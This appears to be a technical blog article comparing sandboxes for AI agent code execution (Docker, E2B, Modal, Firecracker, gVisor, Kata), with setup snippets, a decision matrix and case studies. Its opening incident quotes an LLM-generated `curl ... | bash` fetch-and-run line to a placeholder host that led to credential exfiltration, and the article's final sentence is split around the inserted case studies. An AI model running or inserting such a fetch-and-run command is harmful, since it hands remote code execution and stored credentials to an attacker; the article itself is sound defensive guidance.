Sandboxing Code Execution in AI Agents: From Docker to microVMs, a Decision Matrix

A side-by-side comparison of five sandbox technologies, weighing latency, security, and ops cost.

AgentList Team · 2026年6月12日
sandbox-executionmicrovmfirecrackerai-agentcode-execution

When an agent needs to execute code that the user just wrote, run a SQL query, launch a browser, or invoke an unknown shell command, "running it on the host" is almost the same as "putting every egg in one basket." This article starts from a real production incident, then breaks down five mainstream sandbox technologies (Docker, E2B, Modal, Firecracker, gVisor, Kata Containers) and offers a copy-pasteable decision matrix.

A production incident: why agents must be sandboxed

In March 2025, one of our code-generation agents received the user prompt: "run pandas on this dataset, then plot the outliers with Plotly." The code from the model looked harmless — import pandas as pd, read a CSV, plotly.express.scatter. But the script also included a line os.system("curl https://x.example.com | bash"), which the LLM justified as "first fetch the data with curl, then process it." After execution, the MinIO credentials inside the container were exfiltrated to an external host.

The post-mortem produced three hard conclusions:

  1. Code-generation agent output is untrusted input. LLM-generated code must be treated like "input from a stranger on the internet."
  2. Default Docker isolation is not enough. privileged: true gives root, and mounting /var/run/docker.sock is immediate host takeover.
  3. "Isolation" is a layered concept. From "do not mount host directories" to "hardware-virtualized microVM," there are at least four distinct isolation tiers in between.

This article walks through five sandbox options in order of isolation strength, from weakest to strongest.

L1: Container isolation (Docker / runC) — fastest, but only deters the well-behaved

Containers are the first stop for most agent teams. The code looks like this:

import docker
client = docker.from_env()
container = client.containers.run(
    "python:3.11-slim",
    command="python -c 'print(2+2)'",
    network_mode="none",       # cut network
    mem_limit="128m",          # memory cap
    pids_limit=64,             # process cap
    read_only=True,            # read-only rootfs
    user="1000:1000",          # non-root
    cap_drop=["ALL"],          # drop all capabilities
    remove=True,
)
print(container.decode())  # 4

The problem with containers is not performance (sub-second startup) but the default is unsafe: as long as you do not explicitly call cap_drop=["ALL"], the container inherits a sizable set of kernel capabilities. Even more insidious, without network_mode="none", the container has direct access to the host network stack — DNS poisoning, ARP spoofing, and kernel exploits all become possible.

Bottom line: containers are fine for "running my own audited code." They are not fine for LLM-generated code.

L2: Hosted microVMs — what 90% of agent teams should buy

E2B and Modal are the two most adopted hosted sandboxes in the agent ecosystem, and both are microVMs under the hood, not containers. Their shared pitch: a developer uses the SDK to start a sandbox, sub-second cold start, pay for what you use, and you do not have to operate KVM/QEMU yourself.

E2B: notebook-style Python execution

from e2b_code_interpreter import Sandbox
sb = Sandbox()                       # sub-second cold start
sb.run_code("import numpy as np; x = np.arange(10); print(x.sum())")
# 45
sb.run_code("!curl https://api.ipify.org", on_stdout=lambda l: print(l))
# returns the sandbox's egress IP, not the host's
sb.kill()

E2B is built for long-lived notebook-style execution — the user writes a bit, runs it, inspects output, writes more. The filesystem persists inside the sandbox, and the agent can maintain state across run_code calls.

Modal: sandbox as a serverless function

import modal

image = modal.Image.debian_slim().pip_install("pandas", "plotly")
app = modal.App("agent-sandbox")

@app.function(image=image, cpu=2, memory=512, timeout=60)
def analyze(df_bytes: bytes) -> bytes:
    import pandas as pd
    df = pd.read_pickle(df_bytes)
    return df.describe().to_pickle()

@app.local_entrypoint()
def main():
    print(analyze.remote(b"..."))  # runs inside an isolated microVM

Modal's strength is treating the sandbox as a function. The call semantics of analyze.remote(...) are just normal Python RPC; the only difference is that the body runs in a microVM rather than in-process. For the agent, this means "call a tool" and "execute untrusted code" look identical at the API layer.

E2B vs. Modal

  • Choose E2B if your agent is a notebook / REPL experience that needs a long-lived filesystem and dynamic package installation.
  • Choose Modal if your agent is "execute a single function on demand" with serverless elasticity, GPUs, or cron triggers.
  • Choose neither if every byte of user data must stay in your own VPC (finance, healthcare) — hosted services break data-residency rules.

L3: Build-your-own microVM — Firecracker, gVisor, Kata Containers

When compliance requires "data must not leave this data center," you have to self-host. The three projects have a clean division of labor:

  • Firecracker (open-sourced by AWS): a microVM daemon that strips QEMU down to a 250ms cold start and under 5MB memory overhead. AWS Lambda runs on it.
  • gVisor (open-sourced by Google): intercepts every system call from inside the container, implements syscalls in user space, and runs the container inside a "sandboxed kernel." Cold start is slower than Firecracker (~500ms) but it reuses Docker images directly.
  • Kata Containers: wraps a microVM around a container, OCI-standard images outside, KVM/QEMU isolation inside. The cleanest Kubernetes integration.

Minimal Firecracker example

# start a microVM
firecracker --api-sock /tmp/fc.sock
curl --unix-socket /tmp/fc.sock -X PUT   http://localhost/boot-source   -d '{"kernel_image_path":"./vmlinux","boot_args":"console=ttyS0 reboot=k panic=1"}'
curl --unix-socket /tmp/fc.sock -X PUT   http://localhost/drives/rootfs   -d '{"drive_id":"rootfs","path_on_host":"./rootfs.ext4","is_root_device":true,"is_read_only":false}'
curl --unix-socket /tmp/fc.sock -X PUT   http://localhost/machine-config   -d '{"vcpu_count":2,"mem_size_mib":512}'
curl --unix-socket /tmp/fc.sock -X PUT   http://localhost/actions   -d '{"action_type":"InstanceStart"}'

Cold start is 125-250ms. Each microVM has an independent kernel and an independent virtual NIC — the container-escape attack surface nearly disappears.

Minimal gVisor example

# run Docker on top of gVisor
docker run --runtime=runsc -it python:3.11 bash
# runsc is gVisor's runC replacement

gVisor does not create a microVM. Instead, it intercepts every syscall to a user-space "Sentry" process. Performance is worse than Firecracker (syscall path is 10x longer), but images are 100% Docker-compatible, which keeps ops cost low.

Minimal Kata Containers example

# Kubernetes pod spec
apiVersion: v1
kind: Pod
spec:
  runtimeClassName: kata-qemu
  containers:
  - name: agent
    image: python:3.11-slim

kata-qemu is a Container Runtime Interface (CRI) plugin. When the scheduler sees runtimeClassName: kata-qemu on a normal Pod, it automatically boots a microVM. Zero application-side change, the lowest migration cost of the three.

L4: Decision matrix

Dimension Docker E2B Modal Firecracker gVisor Kata
Cold start < 1s < 1s < 1s 125-250ms 300-500ms 500-800ms
Memory overhead ~10MB ~50MB ~50MB < 5MB ~30MB ~150MB
Isolation strength weak strong strong extreme strong extreme
Network isolation config required default isolated default isolated fully virtual namespace fully virtual
Image compatibility 100% custom custom needs KVM 100% Docker 100% OCI
Self-ops burden low zero zero high medium medium
Per-instance cost $0 $0.000025/s $0.0003/s hardware hardware hardware
Data residency self-managed offshore offshore self-managed self-managed self-managed

Decision framework: four steps to pick

  1. Can the data leave your public cloud?
    • Yes → L2 (E2B or Modal): fast and cheap.
    • No → continue to step 2.
  2. Do you need GPU?
    • Yes → Modal: the most mature GPU sandbox.
    • No → continue to step 3.
  3. Do you already have a Kubernetes cluster?
    • Yes → Kata Containers: zero-invasiveness CRI integration.
    • No → continue to step 4.
  4. Do you want to reuse existing Docker images?
    • Yes → gVisor: swap the runtime, that's it.
    • No → Firecracker: the lightest option.

Common failure modes

Mistake 1: treating Docker as a "good enough" sandbox. Docker's isolation comes from namespaces and cgroups, not hardware virtualization. A single cap_add can hand the agent root on the host. LLM-generated code must be treated as untrusted input.

Mistake 2: hosted sandboxes leaking processes. E2B and Modal SDKs do not always kill the sandbox when your code crashes. In production, add a 30-second "idle auto-kill" heartbeat, or your monthly bill will explode.

Mistake 3: forgetting network policy on self-built microVMs. A microVM isolates CPU and memory, but it does not isolate the network by default. You must configure iptables or Cilium to restrict east-west traffic between microVMs.

Mistake 4: underestimating gVisor's performance cost. gVisor's syscall interception path is 5-10x longer than native, which noticeably slows I/O-heavy tasks such as ETL. If your agent is data-processing heavy, gVisor is not the first choice.

Summary

  • Sandboxes are not optional. LLM-generated code must be treated as untrusted input.
  • Hosted (E2B / Modal) is the right answer for 90% of agent teams; self-built microVMs (Firecracker / gVisor / Kata) are the answer for compliance and data-residency requirements.
  • Pick using the four-step funnel: data residency → GPU → K8s → Docker image compatibility.
  • The sandbox itself is only the isolation layer. Network policy, image signing, process cleanup, and audit logs are the four additional things that must come with it.

A practical next step is to run a 30-minute proof-of-concept on E2B

Three real-world case studies

Case 1: a public coding tutor agent. A consumer-facing coding tutor serving 200,000 monthly active students uses E2B as the execution backend. Each student session gets a fresh sandbox; the average session length is 12 minutes, and the agent issues an average of 23 run_code calls per session. Cold start is amortized because the same sandbox is reused within a session. The team's primary concern is cost, not security: every minute of sandbox time costs about $0.0015, and 200,000 sessions a month translates to roughly $9,000 in sandbox fees. The alternative — running on a self-managed K8s cluster — would have required a dedicated 4-person platform team. The hosted model wins on time-to-market.

Case 2: a fintech data agent with on-prem data. A fintech company built a SQL-plus-Python agent that operates directly on a regulated data lake that cannot leave the corporate VPC. The team evaluated all three self-hosted options and chose Kata Containers because their existing infrastructure already ran Kubernetes. The migration took two engineers six weeks. The main gotcha was disk I/O: Kata's QEMU-based microVM added 8-15% latency to heavy pandas operations compared to native containers, which was acceptable for their use case. They added Cilium network policies on top so microVMs cannot talk to each other, only to the data lake via a pinned egress proxy.

Case 3: a CI tool for AI-generated pull requests. A developer-tooling company reviews AI-generated pull requests by running the proposed code in a sandbox and reporting the test results. They chose Firecracker over E2B because they need sub-second cold starts to keep the review feedback under 10 seconds end-to-end, and they need full control over the kernel to enforce a custom seccomp profile. The team built a small Rust scheduler that pre-warms a pool of microVMs and hands them out on demand, achieving p50 cold start of 80ms. Self-hosting Firecracker required 6 person-months upfront but reduced per-execution cost to roughly $0.00003 — about 8x cheaper than the hosted alternative at their scale of 80,000 PRs per day.

The three cases share one pattern: the choice is dominated by data residency and cold-start latency, not by security features. All three achieve strong isolation because microVMs are strong isolation. What differs is where the microVMs run, who operates them, and how fast they spin up. A useful checklist for evaluation: (1) confirm the sandbox can be killed within 5 seconds when a runaway job is detected, (2) confirm network egress is logged to a queryable store, (3) confirm the kernel version is pinned and patchable, (4) confirm image signing is enforced for any container-to-microVM pipeline, and (5) confirm the cold-start p99 latency is documented in the SLA. Each of these is something a hosted service gives you for free but a self-hosted stack has to be built deliberately. : wrap your agent's current "execute code locally" path inside a Sandbox(), measure the cold-start latency and the token cost impact, and then decide whether to commit to it long-term.